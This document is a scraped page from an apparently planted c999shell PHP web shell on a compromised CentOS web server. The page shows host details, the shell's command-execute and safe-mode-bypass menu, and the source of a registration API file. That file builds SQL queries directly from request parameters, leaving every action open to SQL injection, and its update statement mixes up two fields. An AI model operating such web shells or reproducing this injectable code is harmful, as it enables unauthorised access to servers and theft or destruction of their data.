Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reg-tools/api/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php include("../include/class.mysqldb.php"); include("../include/config.inc.php"); if($_REQUEST["action"] == "insertCd"){ $sql = "SELECT * FROM rg_Condition ORDER BY cdId DESC LIMIT 1"; $link->query($sql); $rs = $link->getnext(); $sql = "INSERT INTO rg_Condition VALUES ('', '" . ($rs->cdCode + 1) . "','" . $_REQUEST["cdName"] . "','" . $_REQUEST["cdNameE"] . "','" . $_REQUEST["cdAbbr"] . "','" . $_REQUEST["cdAbbrE"] . "','" . $_REQUEST["cdType"] . "','" . $_REQUEST["cdMinGrade"] . "','1')"; $link->query($sql); echo "Insert Success!!"; } if($_REQUEST["action"] == "deleteCd"){ $sql = "DELETE FROM rg_Condition WHERE cdId = '" . $_REQUEST["cdId"] . "'"; $link->query($sql); echo "Data deleted."; } if($_REQUEST["action"] == "getCdById"){ $sql = "SELECT * FROM rg_Condition WHERE cdId = '".$_REQUEST["cdId"]."'"; $link->query($sql); echo json_encode($link->getnext()); } if($_REQUEST["action"] == "getCdAll"){ $sql = "SELECT * FROM rg_Condition"; $link->query($sql); $i = 1; while($data = $link->getnext()){ $opt = "<button class='btn btn-primary btn-sm' data-toggle='modal' data-target='#editCondition' data-id='" . $data->cdId . "'>Edit</button>"; $opt .= " <button class='btn btn-danger btn-sm' data-toggle='modal' data-target='#modalDel' data-id='" . $data->cdId . "'>Del</button>"; $json["data"][] = array("No"=>$i++,"cdName"=>"(".$data->cdId.") ".$data->cdName,"cdNameE"=>$data->cdNameE,"cdAbbr"=>$data->cdAbbr,"cdAbbrE"=>$data->cdAbbrE,"cdType"=>$data->cdType,"cdMinGrade"=>$data->cdMinGrade, "opt"=>$opt); } echo json_encode($json); } if($_REQUEST["action"] == "updateCd"){ $sql = "UPDATE rg_Condition SET cdName='" . $_REQUEST["cdName"] . "', cdNameE='" . $_REQUEST["cdNameE"] . "', cdAbbr='" . $_REQUEST["cdAbbrE"] . "', cdType='" . $_REQUEST["cdType"] . "', cdMinGrade='" . $_REQUEST["cdMinGrade"] . "' WHERE cdId = '".$_REQUEST["cdId"]."'"; $link->query($sql); echo "Update Success!!"; } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |